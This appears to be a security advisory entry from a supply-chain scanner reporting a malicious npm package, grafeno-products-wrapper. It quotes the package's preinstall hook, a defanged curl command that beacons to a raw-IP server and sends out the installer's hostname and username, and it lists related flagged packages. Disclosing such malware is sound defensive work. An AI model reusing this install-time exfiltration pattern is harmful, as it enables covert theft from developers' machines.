LWA-2026-11686 confirmed malware
grafeno-products-wrapper@999.0.0
Malicious code in grafeno-products-wrapper (npm)
T1059 · Command and Scripting InterpreterT1082 · System Information DiscoveryT1071.001 · Web ProtocolsT1041 · Exfiltration Over C2 Channel
Analysis
The preinstall hook executes `curl -s hxxp://216[.]126[.]236[.]46:8080/rce?pkg=grafeno-products-wrapper&h=$(hostname)&u=$(whoami)`, contacting a remote server at IP 216[.]126[.]236[.]46:8080 (path /rce) and exfiltrating the installer's hostname and username at install time. The package is a minimal stub (a 25-byte index.js) whose only real behaviour is this install-time recon beacon to a raw-IP endpoint.
- analyzed by
- Leitwacht
- first seen
- Aug 28, 2026, 10:16 PM
- analyzed
- Aug 28, 2026, 10:16 PM
Related advisories
- dsh-tauri-panel-extension@0.4.0
- omniauth-recharge-rails-example@1.0.0
- hydration-vli-ui@1.0.0
- bamru@1.0.0
- r4wk-book@2.2.2
- hydration-cls-ui@1.0.0
- dim-hydration-ui@1.0.0
- dims-hydration-ui@1.0.0
Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.